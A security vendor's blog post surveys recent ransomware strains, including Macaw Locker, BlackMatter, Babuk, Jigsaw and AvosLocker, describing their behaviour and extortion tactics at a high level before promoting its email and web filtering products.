New Ransomware is like any viral outbreak. It continues to evolve and mutate into new variants or strains. When a known ransomware code sequence mutates, we refer to it as a variant. If it takes on multiple mutations to the point that it shows distinct functional properties that differ from the original, it is called a strain. Both biological and digital viral outbreaks constantly evolving to escape detection and remediation techniques. This evolution helps ensure their survival. Ransomware is a categorical generic term that includes many strains and variants. We thought we would take a moment to highlight some of the more recent ransomware strains that have been detected lately.
The latest strain released by the ransomware gang, Evil Corp, was launched in October against multiple victims. The strain gets its name from the fact that it encrypts targeted files and appends the “.macaw” extension to the file name. The attack also creates a ransomware note in every directory that contains a summary of what the attack has done to the victim and directions on how to recover from it. This victim is assigned a campaign ID as well as an assigned negotiation page on the Macaw Locker’s Tor site that includes a chat box to communicate with the attackers. The victim is allotted a tool to decrypt three files for free to illustrate the concept. Victims include a leading medical technology company that was forced to take down is IT systems across North and Central America. Another victim was a TV broadcasting station that lost access to its Active Directory infrastructure which brought down many of its server operations. It is unknown if the ransoms were paid but the initial demands were as high as $40 million.
BlackMatter ransomware is a ransomware-as-a-service tool that first appeared on the scene over the summer. The creators of the strain required their affiliates to target companies with over $100 million in revenue or more with at least 500 hosts. The group also paid up to a $100,000 bonus for exclusive access to a high value network. They also forbid attacks on targets such as critical infrastructure facilities, hospitals, non-for-profit organizations. The BlackMatter ransomware tool was used against numerous companies based in the U.S. with extortion demands ranging from less than $100,000 up to $15 million. The string of successes achieved by the group cast a great deal of attention on the group from government authorities and law enforcement. As a result, the group announced in November that it was disbanding and no longer making their tool available.
Cisco Talos issued a warning in early November about a new variant called Babuk ransomware, which they discovered weeks earlier in October. While its original malware code took advantage vulnerabilities found within Microsoft Exchange Server, the latest release of Babuk targets multiple Windows platforms. In addition to encrypting files, it disrupts system backup processes and deletes any discovered volume shadow copies. It uses a PowerShell command to download the payload which then launches the malicious code across the network.
While Jigsaw ransomware has been around for several years, we wanted to highlight it for its unique voracity. In addition to encrypting the victim’s files, it methodically begins deleting files over a 72-hour period or until the ransom is paid. Should the time period expire, all files are deleted. The enclosed ransom note warns the victim that rebooting the infected machine will result in the deletion of 1,000 files. The malware is delivered through phishing attacks and some Adware on infected sites. There is some good news. The malware is incapable of moving laterally so it only affects the machine that downloads it. You can also stop the file deletion process by stopping the process in Task Manager.
AvosLocker was discovered over the summer. One of its victims was the city of Geneva, Ohio which dealt with the classic double extortion attack that has grown popular as of late. In addition to having the city’s files encrypted, the attackers also threatened to release exfiltrated data to the public that included tax returns, court records and social security numbers. AvosLocker is another ransomware-as-a-service tool and the group behind the ransomware is selectively seeking affiliates that can prove access to a possible target. The ransomware strain is named after its signature that appends the “.avos” extension to all encrypted files. The attackers have been demanding ransoms of approximately $200,000.
In addition to the evolving code variants, the attack objectives of ransomware are evolving as well. No longer is ransomware simply used to encrypt files. The practice of stealing the data prior to encrypting it to release it to the public in the event of nonpayment serves as one more way to ensure getting paid should the victimized organization be able to restore its files from backup. This double extortion approach is now evolving into a triple or quadruple extortion. Upon infiltrating a network, attackers are now maximizing their access to achieve other objectives such as launch crypto mining operations within the victim’s server platforms, initiate denial-of-service attacks, and steal user credentials that they can then harvest for other types of attacks. Ransomware is quickly becoming a multi-threat invasion.
Because of its evolving nature, you cannot rely on signature-based endpoint security solutions to combat ransomware. You need the comprehensive coverage of a multilayer security strategy that includes both email and web filtering. TitanHQ filtering solutions can’t eradicate a ransomware infection, instead they help prevent strains from being delivered in the first place through email and web packets. Find out how you can stop the malicious strains from infecting your enterprise today. Contact TitanHQ today.
Want to learn how to protect your business from phishing and ransomware attacks? Download this free guide
Sign-up for email updates...